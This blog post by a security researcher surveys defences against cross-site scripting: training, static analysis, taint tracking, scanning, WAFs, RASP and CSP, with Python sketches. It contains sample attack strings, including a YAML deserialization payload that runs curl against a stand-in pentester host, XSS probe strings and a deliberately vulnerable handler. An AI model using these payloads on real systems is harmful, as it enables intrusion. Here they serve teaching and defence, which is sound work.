In my last post, we covered what XSS is and why it’s so hard to prevent. Given what we know now, that can seem overwhelming. With even major websites making mistakes, should the rest of us just give up, unplug our internet connections, and go read a book? Of course not. The community has developed a number of techniques to mitigate the risks of XSS. Here’s what we can do to prevent XSS attacks.

Training



The first line of defense is training the developers. At this point, it is rare to come across a developer who has not at least heard of SQL injection. I’d like to thank Randall Munroe, whose xkcd comic about Bobby Tables has become almost mandatory in any lecture on SQL injection.

If you train your developers to treat user-generated content as dangerous, they can try to protect your app through constant vigilance and paranoia.

The limitations of this approach are obvious: your developers are human and make mistakes. Sooner or later they will miss something, or base the decision of whether to escape on a mistaken assumption.

Static analysis

In large software development shops, when an XSS is found, the OpSec team will usually write some kind of signature and scan the entire code base for similar security flaws.

Linters

Over time, these scanners have become formidable linters against a number of recognizable errors, particularly in conjunction with web frameworks that try to make escaping user content the obvious thing to do when it is needed. These tools add lots of value; however, as with all pattern-based matching, there is a limit to the soundness of their conclusions.
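To make the idea concrete, here is a minimal sketch of a signature-based linter. The three signatures are hypothetical examples chosen for illustration, not the rule set of any real scanner; `scan_source` is likewise a made-up name. It reports the file, line, and rule for every match.

```python
import re

# Hypothetical signatures for illustration; real scanners ship far larger,
# framework-aware rule sets.
SIGNATURES = {
    "innerHTML assignment": re.compile(r"\.innerHTML\s*="),
    "Django mark_safe call": re.compile(r"\bmark_safe\("),
    "Jinja |safe filter": re.compile(r"\|\s*safe\b"),
}


def scan_source(path: str, text: str) -> list:
    """Return (path, line number, signature name) for every line that matches."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                findings.append((path, lineno, name))
    return findings


snippet = 'el.innerHTML = userComment;\nel.textContent = userComment;\n{{ comment|safe }}\n'
for finding in scan_source("comment_widget.html", snippet):
    print(finding)
```

The limit on soundness shows up immediately: `el["innerHTML"] = userComment` does exactly the same thing as the first line but slips past the regular expression.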

Taint tracking

The gold standard of static analysis is taint tracking. This is where the system tracks the origin and destination of every string. This enables software to determine if a string moves from one context to another without being escaped.

In a typed language, this can be accomplished by creating new subtypes of string: HTML_string, SQL_string, JS_string, OS_cmd_string, and CSS_string. None of these string types can be concatenated with each other.

```
In [1]: HTML_str('hello ') + 'world'
TypeError: cannot concatenate 'HTML_str' and 'str' objects

In [2]: HTML_str('hello ') + HTML_str.escape('world')
<HTML_str "hello world">
```

If there is an improper concatenation, the code will not even compile (or, in the case of interpreted languages, it will throw an exception).
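One way the `HTML_str` type from the session above might be written in Python is sketched below. It is an assumption for illustration, not a library class: a `str` subclass whose `+` only accepts another `HTML_str`, and whose `escape` classmethod uses the standard library's `html.escape` to turn untrusted text into safe markup.

```python
import html


class HTML_str(str):
    """Hypothetical str subclass marking text that is already safe to embed in HTML.

    Concatenation is only allowed between two HTML_str values; mixing in a plain
    str raises TypeError instead of silently producing unescaped markup.
    """

    @classmethod
    def escape(cls, text: str) -> "HTML_str":
        # html.escape converts &, <, >, " and ' into entities, so untrusted text is inert.
        return cls(html.escape(text))

    def __add__(self, other):
        if not isinstance(other, HTML_str):
            raise TypeError(
                f"cannot concatenate 'HTML_str' and '{type(other).__name__}' objects"
            )
        return HTML_str(str.__add__(self, other))

    def __radd__(self, other):
        # Reached for plain_str + HTML_str; HTML_str + HTML_str goes through __add__.
        raise TypeError(
            f"cannot concatenate '{type(other).__name__}' and 'HTML_str' objects"
        )

    def __repr__(self) -> str:
        return f'<HTML_str "{str.__str__(self)}">'


greeting = HTML_str("hello ") + HTML_str.escape("<b>world</b>")
print(repr(greeting))
try:
    HTML_str("hello ") + "world"
except TypeError as exc:
    print("TypeError:", exc)
```

A caveat for anyone extending this: methods inherited from `str`, such as `join`, `format`, or `upper`, and f-strings all return a plain `str`, so a fuller version would have to cover those paths as well.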

This technique can also be used in languages that lack a typing tradition, by using the metadata pattern.

```
{"some_value": "<html>"}
```

The object above can be transformed to carry a meta_dict that describes the value:

```
{"some_value": [{"metadata": true, "str_type": "text/html"}, "<html>"]}
```

By replacing the object with the list [meta_dict, object], we can add keys to the meta_dict for our strings, and our software systems can enforce that templates only accept strings whose meta_dicts contain the correct tags. Once you have metadata that flows around your system with the data, you will be surprised how many things get simpler.
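A minimal sketch of that enforcement, assuming the `[meta_dict, value]` layout shown above: `tag`, `to_html`, and `render` are hypothetical helpers, not part of any template library. The renderer refuses anything that is not tagged `text/html`, and the only way to get from `text/plain` to `text/html` is through escaping, which updates the tag along with the data.

```python
import html
import json


def tag(value: str, str_type: str) -> list:
    """Wrap a value as [meta_dict, value] using the metadata pattern."""
    return [{"metadata": True, "str_type": str_type}, value]


def to_html(tagged: list) -> list:
    """Escape a text/plain value; the str_type tag changes together with the data."""
    meta, value = tagged
    if meta.get("str_type") != "text/plain":
        raise ValueError(f"expected text/plain, got {meta.get('str_type')!r}")
    return tag(html.escape(value), "text/html")


def render(template: str, **fields: list) -> str:
    """Hypothetical template renderer that only accepts text/html-tagged values."""
    values = {}
    for name, tagged in fields.items():
        is_tagged = (
            isinstance(tagged, list)
            and len(tagged) == 2
            and isinstance(tagged[0], dict)
            and tagged[0].get("metadata") is True
        )
        if not is_tagged:
            raise TypeError(f"field {name!r} carries no meta_dict")
        if tagged[0].get("str_type") != "text/html":
            raise ValueError(f"field {name!r} is {tagged[0].get('str_type')!r}, not text/html")
        values[name] = tagged[1]
    return template.format(**values)


# A value arriving from another service with its metadata attached.
doc = json.loads('{"some_value": [{"metadata": true, "str_type": "text/plain"}, "<script>"]}')
print(render("<p>{c}</p>", c=to_html(doc["some_value"])))  # <p>&lt;script&gt;</p>
```

Passing a bare string, as in `render("<p>{c}</p>", c="<script>")`, raises a `TypeError`, which is the point: untagged data cannot reach the template by accident.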

The drawback to this kind of system is that it is difficult to ensure that the tainting metadata stays with the data as it passes through libraries and micro-services, even when your own micro-services diligently pass meta_dict-tagged objects. It can be done, and in critical systems it will be, but it remains a daunting task.

Active scanning

Scanning is the penetration tester’s bread and butter. This technique treats the application as a black box: start at the main page and find every form and field where the user can put text. GET parameters, POST parameters, HTTP headers, and more can carry user-generated data. If the user can put a string there, the pen-tester wants to send it something it did not expect. If the scanner sends a string like the one below

```
key: !!python/object/apply:os.system ["curl https://pentester.test/id12345"]
```

and your server opens an HTTP connection to the pen-tester’s server, you have a problem.
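A common trick, sketched here as an assumption rather than how any particular scanner works, is to give every probe its own token (like the `id12345` above) so a hit on the callback server can be traced back to the endpoint and field that received it. The payload format is copied from the example (it targets unsafe YAML deserialization); `build_probe` and `attribute_callback` are hypothetical names.

```python
import secrets

# The pen-tester's callback server from the example payload above.
CALLBACK = "https://pentester.test"


def build_probe(endpoint: str, field: str, registry: dict) -> str:
    """Return a payload carrying a unique token and remember where it was sent."""
    token = "id" + secrets.token_hex(4)
    registry[token] = (endpoint, field)
    return f'key: !!python/object/apply:os.system ["curl {CALLBACK}/{token}"]'


def attribute_callback(request_path: str, registry: dict):
    """Map a hit on the callback server (e.g. '/id1a2b3c4d') back to endpoint and field."""
    return registry.get(request_path.rsplit("/", 1)[-1])


registry = {}
payload = build_probe("/api/profile", "bio", registry)
print(payload)
# Later the callback server logs a request; simulate it with the token from the payload.
token = payload.rsplit("/", 1)[-1].rstrip('"]')
print(attribute_callback("/" + token, registry))  # ('/api/profile', 'bio')
```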

To use this technique, you don’t have to plumb metadata through your system or drive your developers to paranoia. You just find the bugs and fix them.

Automatic scanners can run through your site constantly, monitoring for the introduction of new XSS vulnerabilities. When the scanner randomly generates attack payloads, this is known as fuzzing, and it is a rich source of bug reports.
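A toy version of that loop is sketched below. The two "endpoints" are hypothetical in-process functions standing in for a live site, and the seed payloads and context-breaking prefixes are illustrative choices. The detector is deliberately simple: a payload echoed back verbatim was not escaped.

```python
import html
import random


# Hypothetical endpoints standing in for a live site.
def vulnerable_search(query: str) -> str:
    return f"<p>Results for {query}</p>"  # reflects input unescaped


def fixed_search(query: str) -> str:
    return f"<p>Results for {html.escape(query)}</p>"


SEEDS = ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>"]
# Prefixes that try to break out of the context the input lands in.
BREAKOUTS = ["", '"', "'", "-->", "</title>", "</textarea>"]


def fuzz(handler, rounds: int = 50, seed: int = 0) -> list:
    """Send randomly mutated payloads; report those reflected back verbatim."""
    rng = random.Random(seed)  # seeded so a finding can be reproduced
    hits = []
    for _ in range(rounds):
        payload = rng.choice(BREAKOUTS) + rng.choice(SEEDS)
        if payload in handler(payload):  # verbatim echo means it was not escaped
            hits.append(payload)
    return hits


print(len(fuzz(vulnerable_search)), fuzz(fixed_search))  # 50 []
```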

There is, of course, a downside to this method. What the black-box nature of this testing bought us, it costs us in the usefulness of the report. Where static analysis told us the file, line, and character at which the bug was detected, the scanner just tells us which API endpoint and field. We are left spelunking through our architecture, trying to figure out where this field goes and who processes it. Was it stored in a database? There can sometimes be a notable gap between finding a bug with the active scanner and fixing it.

Runtime protection

Now we come to my favorite mitigation. Runtime protection is the last line of defense. To get here, the developers have written code, the static analysis has passed it, the active scanners have missed it, and yet here is an XSS that has appeared on your site in production. How did this happen? What do you do?

“There is no teacher but the enemy. No one but the enemy will tell you what the enemy is going to do. No one but the enemy will ever teach you how to destroy and conquer. Only the enemy shows you where you are weak. Only the enemy tells you where he is strong. And the rules of the game are what you can do to him and what you can stop him from doing to you. I am your enemy from now on. From now I am your teacher.”

Mazer Rackham, in Ender’s Game by Orson Scott Card, p. 184

Why did the flaws show up in production? Because you protected against everything you could think of and the hacker did something else.

WAF

There is a long history in the network security world of making lists of things not to do. The firewall in the network layer was a list of IPs to not talk to. In the transport layer, we list the ports not to talk on. Now, the firewall has reached the application layer.

The application layer is not like the lower layers, with their small amounts of highly regular data. HTTP has lots of places to put state. The URL has the subdomain, an arbitrarily deep nested namespace. The URL has a path, a second arbitrarily nested namespace. The method is a field that changes the meaning of other fields. There are the GET parameters from the URL and the POST payload with arbitrary contents. Just for good measure, the headers are a string-to-string key-value map that has been used in a plethora of ways, and many of the headers are effectively their own small programming languages. It is a miracle that this stuff works at all, never mind securely.
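To see how many places one request offers, the sketch below pulls the surfaces listed above out of a single request using the standard library's `urllib.parse`. The function name, the example URL, and the two simplifications flagged in the comments (the registered domain is the last two labels; the body is form-encoded) are assumptions for illustration.

```python
from urllib.parse import parse_qs, urlsplit


def input_surfaces(method: str, url: str, headers: dict, body: str) -> dict:
    """List the places in one HTTP request where a client can put a string."""
    parts = urlsplit(url)
    return {
        # Crude: assumes the registered domain is the last two labels.
        "subdomain": parts.hostname.split(".")[:-2],
        "path": [segment for segment in parts.path.split("/") if segment],
        "method": method,
        "get_params": parse_qs(parts.query),
        # Assumes an application/x-www-form-urlencoded body.
        "post_params": parse_qs(body),
        "headers": headers,
    }


request = input_surfaces(
    "POST",
    "https://a.b.my.site.com/blog/2018/post?id=7&ref=%3Cscript%3E",
    {"User-Agent": "<svg onload=alert(1)>", "Cookie": "session=abc"},
    "comment=hello&name=%3Cb%3E",
)
for surface, value in request.items():
    print(f"{surface:12} {value}")
```

Every one of these values, including the header that is supposed to name a browser, can carry an attack string, and a WAF has to inspect all of them.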

So the WAF has the simple task of looking at this crazy data structure and deciding whether the data will harm the application it is protecting. This gives us a remarkable power if we have been running active scanners: the ability to take the output from a scan (an API endpoint, a field, and the data that caused a vulnerability) and block traffic on those conditions.
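A minimal sketch of turning scan findings into blocking rules follows. `ScanFinding` and `VirtualPatch` are hypothetical names, and exact substring matching is the simplest possible rule, chosen to mirror the endpoint, field, and data triple described above rather than how any commercial WAF matches.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanFinding:
    endpoint: str  # API endpoint the scanner reported
    field: str     # parameter it injected into
    payload: str   # data that triggered the vulnerability


class VirtualPatch:
    """Hypothetical WAF rule set built from active-scan findings."""

    def __init__(self):
        self.rules = {}  # (endpoint, field) -> set of blocked payloads

    def add_finding(self, finding: ScanFinding) -> None:
        self.rules.setdefault((finding.endpoint, finding.field), set()).add(finding.payload)

    def allows(self, endpoint: str, params: dict) -> bool:
        """Block the request if any field carries a payload recorded for that endpoint."""
        for field, value in params.items():
            for payload in self.rules.get((endpoint, field), ()):
                if payload in value:
                    return False
        return True


waf = VirtualPatch()
waf.add_finding(ScanFinding("/search", "q", "<script>"))
print(waf.allows("/search", {"q": "cats"}))               # True
print(waf.allows("/search", {"q": "<script>alert(1)"}))   # False
print(waf.allows("/about", {"q": "<script>alert(1)"}))    # True: rule is scoped to /search
print(waf.allows("/search", {"q": "<SCRIPT>alert(1)"}))   # True: exact matching is easy to evade
```

The last line is a reminder that a rule derived from one finding only buys time; the underlying bug still needs fixing.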

The real power of a WAF comes when you combine the data from many WAFs across the web. A WAF can never block all attacks, but if we monitor the campaigns under way across the internet, then by the time a campaign reaches your servers its signature may already have been detected elsewhere on the web, and your servers can ignore the traffic from that campaign.
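The sharing idea can be sketched as a feed where many sites report payload fingerprints and a payload is treated as a known campaign once enough distinct sites have seen it. `CampaignFeed`, the normalization (lowercase, collapsed whitespace), and the threshold are all assumptions made for illustration, not how any particular vendor aggregates data.

```python
import hashlib
from collections import defaultdict


class CampaignFeed:
    """Hypothetical shared feed where WAFs on many sites report attack payloads."""

    def __init__(self, threshold: int = 3):
        # Assumed policy: block once this many distinct sites have reported a payload.
        self.threshold = threshold
        self.sites_by_fingerprint = defaultdict(set)

    @staticmethod
    def fingerprint(payload: str) -> str:
        # Normalize case and whitespace so trivial variants share one fingerprint.
        normalized = " ".join(payload.lower().split())
        return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

    def report(self, site: str, payload: str) -> None:
        self.sites_by_fingerprint[self.fingerprint(payload)].add(site)

    def is_known_campaign(self, payload: str) -> bool:
        sites = self.sites_by_fingerprint.get(self.fingerprint(payload), set())
        return len(sites) >= self.threshold


feed = CampaignFeed(threshold=2)
feed.report("shop.example", "<script src=//evil.test/x.js></script>")
print(feed.is_known_campaign("<script src=//evil.test/x.js></script>"))  # False: one site so far
feed.report("blog.example", "<SCRIPT  src=//evil.test/x.js></script>")
print(feed.is_known_campaign("<script src=//evil.test/x.js></script>"))  # True
```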

The speed and attack-centric nature of the WAF make it a powerful tool in the quiver of anyone charged with protecting a web application. It does, however, have its limitations. Unlike taint tracking and static analysis, the WAF has no idea what the application is doing or why. It can block things that look like SQL injection, but what if my app is a database of exploits? It should be possible to build such an app, but the WAF will think it is being attacked.

RASP

“The best material model of a cat is another, or preferably the same, cat.“

A. Rosenblueth, Philosophy of Science, 1945

The next step beyond the WAF is RASP, Runtime Application Self-Protection. By hooking into the application itself, we see not just the traffic from the web, as the WAF does, but also what the app did in response. The WAF can guess that !!python/object/apply:os.system ["curl https://pentester.test/id12345"] is an attempt to execute an OS command, but a RASP can see that a call to os.system was attempted. The WAF reacts to what looks bad; the RASP reacts to what is bad. This lets us set stricter rules, e.g.:

my.site.com/about never gets to run an OS command and never gets to read the database. It is only allowed to increment the view count in memcached. If you want to move from a set of signatures to a set of permissions, you need visibility into the app; we cannot do this from the outside looking in. Each API endpoint has a responsibility and should receive only the privileges commensurate with that responsibility.
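Python ships a hook point that fits this idea well enough for a sketch. `sys.addaudithook` (Python 3.8+) calls a function for runtime audit events such as `os.system`, `subprocess.Popen`, and `socket.connect`, and raising from the hook aborts the operation. The permission map, the endpoint names, and the `handle` wrapper below are hypothetical. PEP 578, which introduced audit hooks, is explicit that they are not a sandbox, so read this as an illustration of per-endpoint permissions, not a production RASP.

```python
import contextvars
import os
import sys

# Endpoint currently being served; a real RASP would set this from framework hooks.
current_endpoint = contextvars.ContextVar("current_endpoint", default=None)

# Hypothetical allowlist: the audit events each endpoint may raise.
# Guarded events missing from an endpoint's set are denied.
PERMISSIONS = {
    "/about": {"socket.connect"},  # e.g. talk to memcached, nothing else
    "/admin/backup": {"os.system", "subprocess.Popen"},
}
GUARDED = {"os.system", "subprocess.Popen", "socket.connect", "sqlite3.connect"}


def rasp_hook(event: str, args: tuple) -> None:
    endpoint = current_endpoint.get()
    if endpoint is None or event not in GUARDED:
        return  # not inside a request, or not an event this sketch polices
    if event not in PERMISSIONS.get(endpoint, set()):
        # Raising from an audit hook aborts the operation that raised the event.
        raise PermissionError(f"{endpoint} may not trigger {event}")


sys.addaudithook(rasp_hook)


def handle(endpoint: str, view):
    """Run a view function with the endpoint recorded for the hook."""
    token = current_endpoint.set(endpoint)
    try:
        return view()
    finally:
        current_endpoint.reset(token)


try:
    handle("/about", lambda: os.system("curl https://pentester.test/id12345"))
except PermissionError as exc:
    print("blocked:", exc)
```

Note the default: an endpoint missing from `PERMISSIONS` gets an empty set, so every guarded event is denied unless someone explicitly grants it.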

With the network firewall, we started with all ports open and only blocked a port once there was a known attack that used it. Now we only open the ports we need. The database only accepts connections from the IPs of our web servers, on the ports we set. This reduced the attack surface and made our data far safer. RASP enables us to move from a blacklist model to a whitelist model in the application layer.

An added benefit of using a RASP in conjunction with active scanners is that we get back the transparency we lost to black-box probes. When the scanners manage to execute a command, the RASP can catch it and grab a stack trace. Before, we did not know how the scanners were getting through; now we get an injection event. This event gives us the information we need to make a WAF rule that blocks the attack immediately, and the underlying trace we need to fix the actual problem.
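The sketch below shows what such an injection event could contain, again using `sys.addaudithook` as a stand-in for a real RASP agent. The event layout and `update_profile`, a deliberately buggy function, are hypothetical. The event keeps the arguments (what a WAF rule could match on) and the stack (where the code needs fixing).

```python
import os
import sys
import traceback

INJECTION_EVENTS = []


def reporting_hook(event: str, args: tuple) -> None:
    if event != "os.system":
        return
    # format_stack() ends with this hook's own frame; drop it so the last
    # entry is the application code that made the call.
    stack = traceback.format_stack()[:-1]
    INJECTION_EVENTS.append({"event": event, "args": [repr(a) for a in args], "stack": stack})
    raise PermissionError("os.system blocked by RASP")


sys.addaudithook(reporting_hook)


def update_profile(bio: str) -> None:
    # Hypothetical buggy code path: user input reaches a shell command.
    os.system("echo " + bio)


try:
    update_profile("hi; curl https://pentester.test/id12345")
except PermissionError:
    pass

event = INJECTION_EVENTS[-1]
print(event["args"])       # the data a WAF rule could match on
print(event["stack"][-1])  # the line of application code to fix
```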

The RASP feeds off the scanners and feeds the WAF, the static analysis, and the training material. It gives you the visibility that you need in order for your enemy to teach you how to defend yourself.

Client-side protection

The problem of XSS has been fought on the server for years, but we are not done yet. Unexpected content can be injected through queries, comments, names, addresses, basically every string the user can affect, so we take the fight to the client as well. While progress has been made server side, the browser community has also decided to take on the fight. Let me introduce you to CSP, the Content Security Policy. This is an HTTP header. (Yes, that is correct: we added another header to our HTTP traffic, with its own small language for the WAFs to deal with. Oh joy.) This header tells the browser which origins we expect to see interacting with our page. Continuing the ad example from my last post, if you list the domains of your ad network and your analytics collector, then when an attacker succeeds in injecting a script or iframe, its src will not be on your list and the content will not be loaded. Inline scripts are identified by a hash, and remote ones by a domain name, a hash, or both. This too acts as a whitelist of the acceptable content for your page. While it will not prevent all injection of content, it makes the content that is injected much safer.
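As a sketch of what such a policy looks like, the function below assembles a `Content-Security-Policy` value with `'self'`, an allowlist of remote origins, and a `'sha256-…'` hash source for each inline script. The origins stand in for an ad network and analytics collector and are made up, as are the helper names. The hash has to be computed over the exact text between the `<script>` tags, whitespace included.

```python
import base64
import hashlib


def csp_hash(inline_script: str) -> str:
    """Hash source for an inline <script> body, formatted as 'sha256-<base64>'."""
    digest = hashlib.sha256(inline_script.encode("utf-8")).digest()
    return "'sha256-" + base64.b64encode(digest).decode("ascii") + "'"


def build_csp(script_origins: list, frame_origins: list, inline_scripts: list) -> str:
    script_src = ["'self'", *script_origins, *(csp_hash(s) for s in inline_scripts)]
    return "; ".join([
        "default-src 'self'",
        "script-src " + " ".join(script_src),
        # An empty allowlist becomes 'none': no iframes at all.
        "frame-src " + (" ".join(frame_origins) or "'none'"),
    ])


header = build_csp(
    script_origins=["https://ads.example.net", "https://analytics.example.org"],
    frame_origins=["https://ads.example.net"],
    inline_scripts=["console.log('page loaded');"],
)
print("Content-Security-Policy: " + header)
```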

CSP has two main roles: protection and transparency. Protection is accomplished by not loading content from untrusted origins. Transparency is accomplished by reporting the blocked scripts to a server of your choosing. As I discussed in the RASP section, we need to be able to see who is attacking us and how in order to update our rules and stay one step ahead.
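On the transparency side, browsers POST a JSON violation report to the URL named in the policy's `report-uri` directive. The legacy format wraps the details in a top-level `"csp-report"` object with keys such as `"blocked-uri"` and `"violated-directive"` (newer browsers also support the Reporting API via `report-to`, which is not shown). Below is a minimal sketch of a collector that tallies what was blocked; the function name and sample report are illustrative.

```python
import json
from collections import Counter


def summarize_reports(bodies: list) -> Counter:
    """Count (directive, blocked-uri) pairs in legacy report-uri POST bodies."""
    counts = Counter()
    for body in bodies:
        report = json.loads(body).get("csp-report", {})
        directive = report.get("effective-directive") or report.get("violated-directive")
        counts[(directive, report.get("blocked-uri"))] += 1
    return counts


sample = json.dumps({"csp-report": {
    "document-uri": "https://my.site.com/article",
    "violated-directive": "script-src-elem",
    "effective-directive": "script-src-elem",
    "blocked-uri": "https://evil.test/x.js",
}})
for (directive, blocked), n in summarize_reports([sample, sample]).most_common():
    print(f"{n} x {directive} blocked {blocked}")
```

A sudden cluster of reports for one blocked origin is exactly the kind of signal that can feed back into WAF rules and code fixes.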

This is a powerful tool, but it is not the limit of what client-side protection can accomplish. We can do even more by loading our own custom JavaScript. By reflecting on the DOM, we can learn a lot about which nodes are present. This is how we go beyond what the server believes it sent to the client and see the page the client actually sees. For example, if a client had ad-stealing malware that replaced all the ads on our site with iframes from its own ad network, the server could not detect this. A script loaded in the HTML page, on the other hand, could see that the nodes had been replaced in the DOM and report the problem to the server.
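The server half of that arrangement might look like the sketch below. It assumes the page script collects iframe sources (for example with `document.querySelectorAll("iframe")`) and posts them as `{"page": ..., "iframes": [...]}`. That report shape, the expected origin, and `unexpected_iframes` are all hypothetical. The server flags any iframe whose origin it never served.

```python
from urllib.parse import urlsplit

# Hypothetical: the only origin our pages are expected to load iframes from.
EXPECTED_IFRAME_ORIGINS = {"https://ads.example.net"}


def unexpected_iframes(report: dict) -> list:
    """Return iframe srcs from a client DOM report that we did not serve."""
    flagged = []
    for src in report.get("iframes", []):
        parts = urlsplit(src)
        if f"{parts.scheme}://{parts.netloc}" not in EXPECTED_IFRAME_ORIGINS:
            flagged.append(src)
    return flagged


report = {
    "page": "https://my.site.com/article",
    "iframes": ["https://ads.example.net/slot1", "https://ad-thief.test/banner"],
}
print(unexpected_iframes(report))  # ['https://ad-thief.test/banner']
```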

Conclusions

If you’ve read both posts, “Why is Cross Site Scripting So Hard?” and now this one, we have looked at the browser’s security model and why the same-origin policy can make the web safe for so many different activities. We learned how user-generated content can inject unwanted scripting into the page. We looked at how sanitizing that user data with escape functions can prevent attackers from harming us. Then we walked through some of the ways we can mitigate the risks posed by XSS.

In the end, XSS is a hard problem with no single magic bullet. But we do have ways to protect our users. By taking an all-of-the-above approach, there is no need to give up hope: we can make the web safe. Whether this is an early introduction to web application security for you or a refresher on a long-studied topic, I hope you learned something.

– Aaron David Goldman, Senior Security Researcher